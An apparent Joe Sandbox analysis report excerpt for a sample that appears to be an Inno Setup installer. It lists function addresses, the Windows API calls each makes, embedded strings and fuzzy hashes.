Opcode Fuzzy Hash: 643da1b25484e25618dfc2f33770e0810dba7622c7134d6ef75615b708b11c8e
Instruction Fuzzy Hash: 04F01CA16447016ED600EAB5CD82A9B76DCEB44354F04883ABE98C72C1D678D808AA66

Function 00424250 Relevance: 6.0, APIs: 4, Instructions: 26windowCOMMON

Download Yara Rule

APIs

GetLastActivePopup.USER32(?), ref: 0042425C
IsWindowVisible.USER32(?), ref: 0042426D
IsWindowEnabled.USER32(?), ref: 00424277
SetForegroundWindow.USER32(?), ref: 00424281

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Window$ActiveEnabledForegroundLastPopupVisible
String ID:
API String ID: 2280970139-0
Opcode ID: 815aaf66aeb93fdb7eaca90ddf7e3ec79125ce151ba931028ab749093d5bac7c
Instruction ID: cc3e18b4355afb8de1117362fa5ee1cc3bb5bcb08e60588071b409dab7082488
Opcode Fuzzy Hash: 815aaf66aeb93fdb7eaca90ddf7e3ec79125ce151ba931028ab749093d5bac7c
Instruction Fuzzy Hash: DBE08691B02571929E71FA671881A9F018CCD45BE434602A7FD04F7243DB1CCC0041BC

Function 00406284 Relevance: 6.0, APIs: 4, Instructions: 11memoryCOMMON

Download Yara Rule

APIs

GlobalHandle.KERNEL32 ref: 00406287
GlobalUnlock.KERNEL32(00000000), ref: 0040628E
GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00406293
GlobalLock.KERNEL32(00000000), ref: 00406299

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Global$AllocHandleLockUnlock
String ID:
API String ID: 2167344118-0
Opcode ID: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
Instruction ID: ad050c8fb554795a0ca7e59246f03ac17dd57b6c6051e6027a9978793207e39e
Opcode Fuzzy Hash: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
Instruction Fuzzy Hash: A0B009C5814A05B9EC0833B24C0BD3F141CD88072C3808A6FB458BA1839C7C9C402A3D

Function 00469FE8 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 259windowCOMMON

Download Yara Rule

APIs

GetSystemMenu.USER32(00000000,00000000,0000F060,00000001), ref: 0046A1F3
EnableMenuItem.USER32(00000000,00000000,00000000), ref: 0046A1F9

Strings

CurPageChanged, xrefs: 0046A394

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Menu$EnableItemSystem
String ID: CurPageChanged
API String ID: 3692539535-2490978513
Opcode ID: ce3d69d9ba1a62642177f6d71e0f7aaa340e11e2d471205b7fc5bc675cd66b6b
Instruction ID: 7720c050ea6da0ef8e1be1b899a85f81ec2d70891b76be637dda81d079de5e74
Opcode Fuzzy Hash: ce3d69d9ba1a62642177f6d71e0f7aaa340e11e2d471205b7fc5bc675cd66b6b
Instruction Fuzzy Hash: 04B12834604604DFCB11DB59DA85EE973F5EF49308F2540F6E804AB362EB38AE51DB4A

Function 00478E14 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 210registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047A685,?,00000000,00000000,00000001,00000000,004790B1,?,00000000), ref: 00479075

Strings

Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 00478EE9
Failed to parse "reg" constant, xrefs: 0047907C

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Close
String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
API String ID: 3535843008-1938159461
Opcode ID: 6cfa3a26321e55d12a01db98da27023ce14a7644c07822183f99b0fb8cfb2842
Instruction ID: fcc941d39f61a36dc7ba98d018d7fa63e98928215e6e5a71d63c1788f81e571e
Opcode Fuzzy Hash: 6cfa3a26321e55d12a01db98da27023ce14a7644c07822183f99b0fb8cfb2842
Instruction Fuzzy Hash: F3818174E00148AFCF10EF95D485ADEBBF9AF49314F50816AE814B7391CB38AE05CB99

Function 00402088 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.KERNEL32(0049A420,00000000,004021FC), ref: 004020CB

Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049A420,00000000,00401A82,?,?,0040222E,02181C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049A420,0049A420,00000000,00401A82,?,?,0040222E,02181C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049A420,00000000,00401A82,?,?,0040222E,02181C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049A420,00401A89,00000000,00401A82,?,?,0040222E,02181C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C

Strings

H=w, xrefs: 004020F8, 00402122, 0040213C

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
String ID: H=w
API String ID: 296031713-625060171
Opcode ID: e2799b5b2f2489a9888bdfe4983345d4327c7833a1c5a51ce4349eec843293c7
Instruction ID: 43da59c6024c014fdcfbd4f667e22ace29d18c19eb36fc191a59cc880b6cb292
Opcode Fuzzy Hash: e2799b5b2f2489a9888bdfe4983345d4327c7833a1c5a51ce4349eec843293c7
Instruction Fuzzy Hash: C941F4B2E003409FDB10CF68DD8921A77A4F7A8328F15417BD844A77E1D3B89851CB89

Function 00481938 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00481AC0,?,00000000,00481B01,?,?,00000001,?,00000000,00000000,00000000,?,0046AF84), ref: 0048196F
SetActiveWindow.USER32(?,00000000,00481AC0,?,00000000,00481B01,?,?,00000001,?,00000000,00000000,00000000,?,0046AF84), ref: 00481981

Strings

Will not restart Windows automatically., xrefs: 00481AA0

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Window$ActiveForeground
String ID: Will not restart Windows automatically.
API String ID: 307657957-4169339592
Opcode ID: 7f50b30166131407a8f128673f7788f83b908c9bbef8313c0fb59228be05c9af
Instruction ID: 795901fb084f52fa528f63c2312e933fc6fdee27908fd8459f339c5c9385a105
Opcode Fuzzy Hash: 7f50b30166131407a8f128673f7788f83b908c9bbef8313c0fb59228be05c9af
Instruction Fuzzy Hash: AC41F030604240AFD725EBA5E945B6E7BA8E726704F1448B7F4408B372E37C5842DB9E

Function 00424950 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00424975
WaitMessage.USER32(00000000,00424A69,?,?,?,?), ref: 00424A49

Strings

+qI, xrefs: 00424A02, 00424A0C, 00424A5B

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CursorMessageWait
String ID: +qI
API String ID: 4021538199-4068327824
Opcode ID: 399c937e83af8c9a67e0d61dfb0eea40f0b910730a113ae452a6132c876950b5
Instruction ID: 850bb8641a739d3fa0e3e078eaa16554ae15adb015fc2a4b55b093a82efb48cd
Opcode Fuzzy Hash: 399c937e83af8c9a67e0d61dfb0eea40f0b910730a113ae452a6132c876950b5
Instruction Fuzzy Hash: DA31C3B17002249BCB11EF79D4817AFB7A5EFC4304F9545ABE8049B386D7789D80CA9D

Function 0046BC48 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON

Download Yara Rule

Strings

Failed to proceed to next wizard page; showing wizard., xrefs: 0046BD6B
Failed to proceed to next wizard page; aborting., xrefs: 0046BD57

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID:
String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
API String ID: 0-1974262853
Opcode ID: 2243244884f8f0dbacf357e303b6debe926f1333eeaeef60402ffea89cf8a6c6
Instruction ID: 41ea3916521a7a624eafe14c23fd6f628d308964d0d2c815b7cc35631b26c174
Opcode Fuzzy Hash: 2243244884f8f0dbacf357e303b6debe926f1333eeaeef60402ffea89cf8a6c6
Instruction Fuzzy Hash: 6D31CE306042049FD711EB69EA85B9977E4EB15304F1440BFF804DB3A2EB386E80CB8A

Function 00477940 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60

RegCloseKey.ADVAPI32(?,00477A26,?,?,00000001,00000000,00000000,00477A41), ref: 00477A0F

Strings

Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0047799A
%s\%s_is1, xrefs: 004779B8

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CloseOpen
String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 47109696-1598650737
Opcode ID: 06886a66f565e0468b769e4592232cec9d6989d0309b3619cbd247b7a06007c3
Instruction ID: 9c5288f04ac2681b3320032c051d60ba9bbc132f2e03367f89e393ba1652dadd
Opcode Fuzzy Hash: 06886a66f565e0468b769e4592232cec9d6989d0309b3619cbd247b7a06007c3
Instruction Fuzzy Hash: 49216174B042046FEB01DBA9CC51A9EBBE8EB89704F90847AE504E7381D6789A058B58

Function 0044F988 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 0044FA1D
ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0044FA4E

Strings

open, xrefs: 0044FA41

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ExecuteMessageSendShell
String ID: open
API String ID: 812272486-2758837156
Opcode ID: ee44408f46f22df0a1b012607f151a7a203705d09399f4342952afd6ee530704
Instruction ID: 219036bbd933cc3ca485a607602a83352c0bb437124d4d28150632e42eb7a986
Opcode Fuzzy Hash: ee44408f46f22df0a1b012607f151a7a203705d09399f4342952afd6ee530704
Instruction Fuzzy Hash: DD213071E00204AFEB00DFA9C881B9EB7F9EB84704F60857AB405F7291D778EA45CB58

Function 00402584 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.KERNEL32(0049A420,00000000,)), ref: 004025C7
RtlLeaveCriticalSection.KERNEL32(0049A420,0040263D), ref: 00402630

Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049A420,00000000,00401A82,?,?,0040222E,02181C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049A420,0049A420,00000000,00401A82,?,?,0040222E,02181C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049A420,00000000,00401A82,?,?,0040222E,02181C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049A420,00401A89,00000000,00401A82,?,?,0040222E,02181C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C

Strings

), xrefs: 004025AE

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocInitializeLocal
String ID: )
API String ID: 2227675388-1084416617
Opcode ID: 88dd2724dbd3ff1c3207952c5660733b34460a855d8f77796fd9f5c01a3a41c6
Instruction ID: e822125da835f5420473686c3c07f3a27ad935215509521471bf00a9407fd077
Opcode Fuzzy Hash: 88dd2724dbd3ff1c3207952c5660733b34460a855d8f77796fd9f5c01a3a41c6
Instruction Fuzzy Hash: 2311EF317042046EEB25AF799E1A62A6AD497D575CB24487BF804F32D2D9FD8C0282AD

Function 00494F8A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00494FC5

Strings

/INITPROCWND=$%x , xrefs: 00494FF0
@, xrefs: 00494F90

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Window
String ID: /INITPROCWND=$%x $@
API String ID: 2353593579-4169826103
Opcode ID: 4dd764281e3e5bd3fffa96cfa0153c2ea98d45f8120ac28787629669d01cae7f
Instruction ID: dd767cc37dfd13d2cdbde0042d97f8edd346c26068944a47342b43ccbe763047
Opcode Fuzzy Hash: 4dd764281e3e5bd3fffa96cfa0153c2ea98d45f8120ac28787629669d01cae7f
Instruction Fuzzy Hash: 8C11D531A042498FDF01DBA5E851BAEBBE8EB49308F20447BE504E7282D73D99058B98

Function 00446C68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9

SysFreeString.OLEAUT32(?), ref: 00446D1A

Strings

Unknown Method, xrefs: 00446CF3
NIL Interface Exception, xrefs: 00446CBC

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: String$AllocByteCharFreeMultiWide
String ID: NIL Interface Exception$Unknown Method
API String ID: 3952431833-1023667238
Opcode ID: 7e876c1741d6a4ab732274b2805af96121c7add3bd5ed47b260724fdb6465e77
Instruction ID: bb0b80e2a380756916404604f3e22b1e01578a82bc6816b9b9cc7d380a4acf04
Opcode Fuzzy Hash: 7e876c1741d6a4ab732274b2805af96121c7add3bd5ed47b260724fdb6465e77
Instruction Fuzzy Hash: D811D671B042089FEB04DFA59D41AAEBBACEB49304F52003EF500E7281DA799D04C62E

Function 004947FC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,004948C4,?,004948B8,00000000,0049489F), ref: 0049486A
CloseHandle.KERNEL32(00494904,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,004948C4,?,004948B8,00000000), ref: 00494881

Part of subcall function 00494754: GetLastError.KERNEL32(00000000,004947EC,?,?,?,?), ref: 00494778

Strings

D, xrefs: 00494844

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CloseCreateErrorHandleLastProcess
String ID: D
API String ID: 3798668922-2746444292
Opcode ID: 25970fbfba956000743cd3c8178cfbc98a37ab1c0a0b6db99df0911e7524530c
Instruction ID: 06a552fcbca6defc8fdbe432d7558d6d49acb7d91bb7665b8ba999baae494250
Opcode Fuzzy Hash: 25970fbfba956000743cd3c8178cfbc98a37ab1c0a0b6db99df0911e7524530c
Instruction Fuzzy Hash: D4015EB5604688AFDF14EBE1CC42E9EBBACDF88714F51007AF504E72D1D6789E068628

Function 0042DC8C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DCA0
RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DCE0

Strings

Inno Setup: No Icons, xrefs: 0042DC9E

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Value$EnumQuery
String ID: Inno Setup: No Icons
API String ID: 1576479698-2016326496
Opcode ID: a6034a78eb6f28d82538eb73d6f8d4d4ecfcbebd89183b5d88f6193e65cc5de6
Instruction ID: 57ddeb90a82b523466695c0d6df077a59cb4ba665f60dcca1a1637bef7e5778e
Opcode Fuzzy Hash: a6034a78eb6f28d82538eb73d6f8d4d4ecfcbebd89183b5d88f6193e65cc5de6
Instruction Fuzzy Hash: 19012B31B4533069F73085167D01F7B668C8B82B64F64003BF941EA3C0D6D99C04D36E

Function 004964C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 0047BB30: FreeLibrary.KERNEL32(73AF0000,0047FFE2), ref: 0047BB46

Part of subcall function 0047B804: GetTickCount.KERNEL32 ref: 0047B84C

Part of subcall function 0045648C: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004564AB

GetCurrentProcess.KERNEL32(00000001,?,?,?,?,00496E1F), ref: 0049651D
TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,00496E1F), ref: 00496523

Strings

Detected restart. Removing temporary directory., xrefs: 004964D7

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
String ID: Detected restart. Removing temporary directory.
API String ID: 1717587489-3199836293
Opcode ID: 41ea43b9c99f94dd411f6220533ab33a70ff77999e7e1cd773f2c523df5ecd5d
Instruction ID: ef6d07dd072ead5de2427941989604cf9fc91a718c8df879baec15603ccd013a
Opcode Fuzzy Hash: 41ea43b9c99f94dd411f6220533ab33a70ff77999e7e1cd773f2c523df5ecd5d
Instruction Fuzzy Hash: BFE0ED722086007EDA0277BABC16A1B3F5CDB8677C793083BF90882543CA2D8804D6BD

Function 00496BAD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63

ReleaseMutex.KERNEL32(00000000,00496C11,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000), ref: 00496BFB
CloseHandle.KERNEL32(00000000,00000000,00496C11,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C), ref: 00496C04

Strings

oI, xrefs: 00496C1E
oI, xrefs: 004968B9, 004968C6, 004968DD, 004968EA, 0049697E, 00496988, 00496998, 004969A2
/REGU, xrefs: 004968ED
Setup, xrefs: 00496903
$pI, xrefs: 004969A5, 004969B2, 00496BAD, 00496A03
